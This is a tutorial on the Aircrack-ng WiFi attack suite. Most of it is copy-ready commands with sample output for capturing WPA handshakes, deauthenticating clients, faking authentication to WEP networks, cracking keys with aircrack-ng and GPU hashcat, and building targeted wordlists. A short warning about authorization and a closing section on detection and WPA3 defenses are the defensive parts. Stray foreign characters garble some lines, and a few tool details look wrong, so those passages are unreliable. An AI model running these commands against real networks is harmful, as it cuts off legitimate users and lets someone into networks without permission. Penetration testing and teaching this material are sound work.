What Is Aircrack-ng?
Aircrack-ng is not a single tool — it's a complete suite of command-line utilities for WiFi network security auditing. The name is a portmanteau of "air" (wireless) and "crack" (break), but the suite does far more than crack passwords. It encompasses everything from putting a wireless card into monitor mode, to capturing packets, injecting frames, performing deauthentication attacks, and — yes — recovering WPA/WPA2 pre-shared keys from captured handshakes.
The suite is maintained as an open-source project on GitHub and is pre-installed on Kali Linux, Parrot OS, and most WiFi security-focused penetration testing distributions. It runs natively on Linux and has been ported to macOS and Windows (via WSL2 or Cygwin), though Linux remains the recommended platform due to superior driver support for monitor mode and frame injection.
Tools in the Aircrack-ng Suite
- airmon-ng — Places wireless interfaces into monitor mode, kills conflicting processes, and manages virtual interfaces. The starting point for every WiFi audit.
- airodump-ng — Passive WiFi reconnaissance: captures all nearby 802.11 frames, extracts handshakes, and logs AP and client data to CSV/JSON files.
- aireplay-ng — Frame injection tool: performs deauthentication attacks, fake authentication attacks, interactive packet replay, and client association flooding.
- aircrack-ng — The cracking engine: takes captured PMKID data or handshake captures and attempts to recover the PSK using dictionary attacks, brute force, or GPU-accelerated computation via Hashcat.
- airdecap-ng — Decrypts WEP and WPA/WPA2 traffic after the PSK has been recovered.
- airolib-ng — Manages pre-computed PMK (Pairwise Master Key) tables for faster WPA cracking.
- airbase-ng — Creates soft APs (similar to hostapd, but designed to complement aircrack workflows).
- packetforge-ng — Crafts encrypted packets for injection from raw fragments.
Installation and Hardware Requirements
Installation
$ # Kali/Parrot (pre-installed)
$ sudo apt update && sudo apt install aircrack-ng
$ # Verify
$ aircrack-ng --help
Aircrack-ng 1.7 - (C) 2006-2024 Thomas d'Otreppe
https://www.aircrack-ng.org
Hardware Requirements
Monitor mode support is non-negotiable. Not all WiFi adapters can enter monitor mode or inject frames. This is a hardware and driver limitation, not a software one.
| Adapter | Chipset | Monitor Mode | Frame Injection | Band |
|---|---|---|---|---|
| Alfa AWUS036ACH | Realtek RTL8812AU | ✅ Yes (with driver) | ✅ Yes | 2.4GHz + 5GHz |
| Alfa AWUS1900 | Realtek RTL8814AU | ✅ Yes | ✅ Yes | 2.4GHz + 5GHz |
| TP-Link TL-WN722N (v1) | Atheros AR9271 | ✅ Yes | ✅ Yes | 2.4GHz only |
| TP-Link TL-WN722N (v2/v3) | Realtek RTL8188EUS | ⚠️ Limited (driver issues) | ⚠️ Partial | 2.4GHz only |
| Internal laptop WiFi | Varies (Intel, Broadcom, etc.) | ⚠️ Varies by model | ❌ Usually no | Varies |
Recommendation: The Alfa AWUS036ACH or AWUS1900 are the gold standard for penetration testing. They support both bands, have excellent driver support in Kali, and can inject at high power (up to 1W with an external antenna on the ACH model).
Basic WiFi Auditing Workflow
Step 1: Place Adapter in Monitor Mode
$ # Check available wireless interfaces
$ iwconfig
wlan0 IEEE 802.11 Mode:Managed ESSID:"Corporate_5G"
$ # Kill conflicting processes (NetworkManager, wpa_supplicant)
$ sudo airmon-ng check kill
Killing these processes:
PID Name
543 wpa_supplicant
612 NetworkManager
$ # Create monitor mode interface on wlan0
$ sudo airmon-ng start wlan0
[airmon-ng] phy#0: device wlan0 -> phy0
[airmon-ng] Monitor mode enabled on [phy0]wlan0mon
$ # Verify
$ iwconfig wlan0mon
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz
Step 2: Reconnaissance with Airodump-ng
$ # Scan all channels, show clients associated with APs
$ sudo airodump-ng wlan0mon --manufacturer --wps
CH 9 ][ Elapsed: 12 s ][ 2026-04-07 10:32 ][ Fixed: Chan 1
BSSID PWR Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
AA:BB:CC:DD:EE:01 -42 134 8 0 11 540 WPA2 CCMP PSK Corporate
AA:BB:CC:DD:EE:02 -67 89 3 0 6 540 WPA2 CCMP PSK Corporate_5G
AA:BB:CC:DD:EE:03 -81 45 0 0 1 130 WPA2 CCMP PSK HomeNetwork
AA:BB:CC:DD:EE:04 -54 98 0 0 36 867 OPN * FreePublicWiFi
AA:BB:CC:DD:EE:05 -38 210 12 0 6 130 WEP WEP OldRouter
BSSID STATION PWR Rate Lost Frames Notes Probes
AA:BB:CC:DD:EE:01 00:11:22:33:44:55 -67 0-54 0 12 EAPOL Corporate
AA:BB:CC:DD:EE:01 66:77:88:99:AA:BB -55 0-54 0 8 EAPOL -
Key columns: PWR (signal strength — closer to 0 is stronger), Beacons (AP broadcast frames), #Data (data frames captured), CH (channel), ENC (encryption), and the lower panel showing STATION (connected clients with their MAC addresses).
Step 3: Capture Handshakes on a Specific AP
$ # Target Corporate AP on channel 11, save capture to /root/captures/
$ sudo airodump-ng wlan0mon \
--channel 11 \
--bssid AA:BB:CC:DD:EE:01 \
--write /root/captures/corporate_handshake \
--output-format pcap
CH 11 ][ Elapsed: 0 s ][ 2026-04-07 10:35:12
BSSID STATION PWR Rate Lost Frames Notes
AA:BB:CC:DD:EE:01 00:11:22:33:44:55 -67 0-54 0 5 EAPOL [HANDSHAKE]
AA:BB:CC:DD:EE:01 66:77:88:99:AA:BB -55 0-54 0 3 EAPOL
[aircrack-ng] WPA handshake captured: AA:BB:CC:DD:EE:01
The [HANDSHAKE] indicator means a 4-way handshake was captured. Airodump-ng will continue running until you stop it — you can leave it capturing for as long as you want to increase the chances of capturing a handshake.
Forcing Handshake Capture with Deauthentication
Passive handshake capture only works when a client naturally connects to the target AP. To speed this up, use aireplay-ng to send deauthentication frames that forcibly disconnect connected clients, prompting them to reconnect — at which point airodump-ng captures the handshake.
$ # Send 10 deauth packets to AA:BB:CC:DD:EE:01 (broadcast deauth to all clients)
$ sudo aireplay-ng wlan0mon --deauth 10 -a AA:BB:CC:DD:EE:01
[aireplay-ng] Sending DeAuth to broadcast -- BSSID: [AA:BB:CC:DD:EE:01]
[aireplay-ng] NB: this attack is more effective on a tightly synchronized network
[aireplay-ng] Got an association response: (00:11:22:33:44:55) - [CLIENT_REASSOC]
$ # Targeted deauth to a specific client (more efficient)
$ sudo aireplay-ng wlan0mon --deauth 5 \
-a AA:BB:CC:DD:EE:01 \
-c 00:11:22:33:44:55
[aireplay-ng] Sending directed deauth to client 00:11:22:33:44:55
Deauthentication attacks disrupt legitimate network access for users on the target AP. In a penetration testing context, they are a standard and authorized technique. Outside of authorized testing, deauth attacks violate the CFAA and similar laws globally — and they affect无辜 bystanders on shared channels. Use only with explicit authorization.
Fake Authentication Attack (WEP)
For legacy WEP-encrypted networks (still found in some IoT and industrial environments), fake authentication allows the attacker to associate with the AP without knowing the WEP key, enabling injection of ARP request packets that accelerate IV collection.
$ # Attempt fake authentication with the WEP AP
$ sudo aireplay-ng wlan0mon --fakeauth 30 -a AA:BB:CC:DD:EE:05 -h 00:11:22:33:44:55
[aireplay-ng] Sending Authentication Request
[aireplay-ng] Authentication successful
[aireplay-ng] Sending Association Request
[aireplay-ng] Association successful :-)
# Now inject ARP requests to generate IVs
$ sudo aireplay-ng wlan0mon --arpreplay -b AA:BB:CC:DD:EE:05 -h 00:11:22:33:44:55
[aireplay-ng] Recaching ARP request #1 from 00:11:22:33:44:55
[aireplay-ng] ARPReplay: injection working — 124 IVs captured
Cracking WPA/WPA2 — Dictionary Attack
Using Aircrack-ng Directly
$ # Crack using a wordlist (rockyou.txt is included in Kali)
$ sudo aircrack-ng \
/root/captures/corporate_handshake-01.cap \
-w /usr/share/wordlists/rockyou.txt
Opening /root/captures/corporate_handshake-01.cap
Reading packets, #Data: 8, format: pcap
Aircrack-ng 1.7
Key Ranking [File: rockyou.txt]
BruteForce腋 Attack
0% | | ETA: ---
23% |========= | ETA: 4:37
KEY FOUND! [ NetworkPassword123! ]
Master Key : 4f 3a d2 8b 1c 09 e7 f4 ...
Transient Key : 8a 7b 3c 9d 2e 1f 4a 6b ...
TKIP MIC : 1a 2b 3c 4d 5e 6f 7a 8b ...
GPU-Accelerated Cracking with Hashcat
CPU-based cracking with aircrack-ng is slow. For real-world penetration testing engagements, convert the handshake capture to Hashcat's format and use a GPU (NVIDIA RTX 3080+ or AMD RX 6800 XT) for dramatically faster cracking — millions of hashes per second.
$ # Convert .cap to HCCAPX format for Hashcat
$ sudo apt install hashcat-utils
$ cap2hccapx /root/captures/corporate_handshake-01.cap /root/captures/corporate.hccapx
Successfully created HCCAPX file for: Corporate
1 WPA hash added from the capture
$ # Crack with Hashcat using GPU
$ hashcat -m 2500 /root/captures/corporate.hccapx /usr/share/wordlists/rockyou.txt -o cracked.txt
hashcat (v6.2.6) starting...
OpenCL API (CUDA) — Platform #1: NVIDIA Corporation
Device #1: NVIDIA GeForce RTX 4090, 24576/24576 MB, 16384 CUDA
Speed.#1:........ 847.3 kH/s
[...] Password recovered: NetworkPassword123!
Session..........: hashcat
Recovered........: 1/1 hashes
A single RTX 4090 can test approximately 800,000+ WPA hashes per second. A password like "Summer2024!" from rockyou.txt would be found in under a second. Even moderately complex passwords (12+ characters, no dictionary words) can resist GPU cracking for years — which is why WPA3 and long, complex passphrases matter.
Wordlist Generation and Usage
Rockyou.txt is a good starter wordlist but is insufficient for targeted professional assessments. Sophisticated password policies mean most corporate WiFi passwords won't appear in rockyou.txt.
$ # Generate a targeted wordlist based on company name, year, common patterns
$ # Using CUPP (Common User Passwords Profiler)
$ git clone https://github.com/Mebus/cupp.git
$ python3 cupp/cupp.py -i
[?] Enter the username: acmecorp
[?] First name: John
[?] Surname: Smith
[?] Birthdate (DDMMYYYY): 01121990
[?] Partners name: Sarah
[?] Company: Acme Corporation
[?] Generating wordlist...
[+] 12,847 passwords generated.
$ # Use hashcat's built-in rules to mutate wordlist
$ # Rule: leetspeak, capitalizations, append numbers
$ hashcat --force /tmp/wordlist.txt -a 0 -r /usr/share/hashcat/rules/best64.rule --stdout | \
hashcat -m 2500 /root/captures/corporate.hccapx
Speed.#1:........ 847.3 kH/s
Cracked with rule variant: AcmeCorp2024!
WiFi-specific Wordlists
$ # Download pre-built WiFi-specific wordlists
$
$ # Sort by likelihood based on target AP SSID
$ grep -i corporate /root/wifi_top1M.txt | head -1000 > /tmp/corporate_wordlist.txt
$ aircrack-ng -w /tmp/corporate_wordlist.txt /root/captures/corporate_handshake-01.cap
Detection by Network Defenders
WiFi attacks leave detectable signatures for organizations with the right monitoring infrastructure:
- Unexpected deauthentication floods: IDS systems like Kismet, Wireshark's built-in radiotap analyzer, and enterprise WIDS (Cisco Prime, Aruba AirWave) detect when deauth frames spike far above normal levels. A surge of deauths on a specific channel is a strong indicator of an active airodump-ng/aireplay-ng operation.
- Rogue AP detection: Enterprise WiFi controllers maintain a database of authorized BSSIDs. Any AP broadcasting with a matching ESSID to a corporate SSID but from an unknown BSSID is immediately flagged as a rogue — and an Evil Twin candidate.
- Monitor mode detection: Some advanced WIDS systems can detect the unique RF signature of a device in monitor mode (sniffing all packets rather than only those addressed to it).
- Client MAC address anomalies: Airodump-ng captures and records all MAC addresses it sees. Organizations with MAC authentication should flag unusual MAC patterns or MAC addresses that appear in probe requests for multiple different SSIDs.
- Handshake capture alerts: Some EDR and network monitoring platforms can detect when a handshake capture file is created on a local system — though this is more relevant for endpoint detection than network monitoring.
The most effective defense against WPA cracking is WPA3-SAE (Simultaneous Authentication of Equals), which provides forward secrecy and is resistant to offline dictionary attacks. WPA2-Enterprise with EAP-TLS (certificate-based mutual authentication) is the next best option. If you must use WPA2-Personal, enforce a minimum 16-character passphrase with no dictionary words or company references.